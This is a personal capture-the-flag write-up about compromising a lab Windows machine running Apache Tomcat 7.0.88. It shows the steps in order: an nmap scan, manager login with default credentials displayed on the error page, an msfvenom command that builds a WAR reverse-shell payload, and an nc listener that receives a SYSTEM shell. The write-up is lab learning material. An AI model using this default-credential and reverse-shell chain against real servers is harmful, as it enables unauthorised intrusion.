Enumeration
Nmap the target machine.
nmap -sC -sV -Pn 10.10.10.95 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 00:55 EDT
Nmap scan report for 10.10.10.95
Host is up (0.18s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
web server on port 8080.
Apache Tomcat home page with the version info.
I found buttons for the manager app and host manager.
I tried to log in, but when I failed, the page with credentials was displayed.
ID: tomcat PW: s3cret
Managed to log in as Jerry! Also, I can see there are upload and deploy buttons.
I think we can upload a reverse shell.
But the web page says it only accepts war extension files.
I don’t know what war is. I googled it and found out it stands for Web Application Resource.
The first time, I just changed the file name to xxx.war. However, it didn’t go well. I kept receiving errors.
Therefore, I googled about it and spent quite a long time. And then luckily I came across this blog post.
https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00
We need to upload a payload made using msfvenom.
msfvenom -p java/shell_reverse_tcp lhost=x.x.x.x lport=xxxx -f war -o file.war
you can refer to this site too
We can upload it to the web page.
Listen to the port we set and click the file. Then we will get connected.
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.95] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
We are in!
user, root flags
We are in Windows system now.
the flags for user and root are in C:\Users\Administrator\Desktop\flags
directory.
No need to escalate the privilege to root.
Thoughts
This machine is rated as easy.
The point was to figure out how to create a proper payload using msfvenom.
If you could do that, this machine would be super easy. However, if you are not familiar with it, then I think it requires quite a time to do research.
From now on, If I come across tomcat, then I will be reminded of msfvenom and payload inside .war file.